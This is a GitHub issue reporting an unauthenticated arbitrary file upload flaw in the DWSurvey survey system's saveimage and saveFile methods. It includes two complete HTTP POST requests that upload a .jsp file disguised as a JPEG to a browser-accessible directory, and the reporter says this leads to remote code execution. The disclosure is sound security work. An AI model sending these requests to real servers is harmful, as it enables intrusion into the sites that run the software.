search

wkeyuan / DWSurvey

Survey System. 最好用的开源问卷调查系统、表单系统。
http://www.diaowen.net
GNU Affero General Public License v3.0
2.59k stars 755 forks source link

Arbitrary file uploads exist #107

Open a02goblin opened 10 months ago

a02goblin commented 10 months ago

``The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

image `POST /diaowen/up/upload!saveimage.action HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Connection: close Content-Length: 395 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="uploadify"; filename="1.jsp" Content-Type: image/jpeg

testnixxx ------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="uploadifyFileName"

1.jpg ------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg ------WebKitFormBoundary12345abcde-- ` image image

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

image `POST /diaowen/up/upload!saveFile.action HTTP/1.1 Host: User-Agent: Mozilla/5.0 Connection: close Content-Length: 489 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="basepath"

files ------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="uploadify"; filename="1.jsp" Content-Type: image/jpeg

testnixxx ------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="uploadifyFileName"

1.jpg ------WebKitFormBoundary12345abcde Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg ------WebKitFormBoundary12345abcde-- ` image image

easyandeasy commented 10 months ago

.....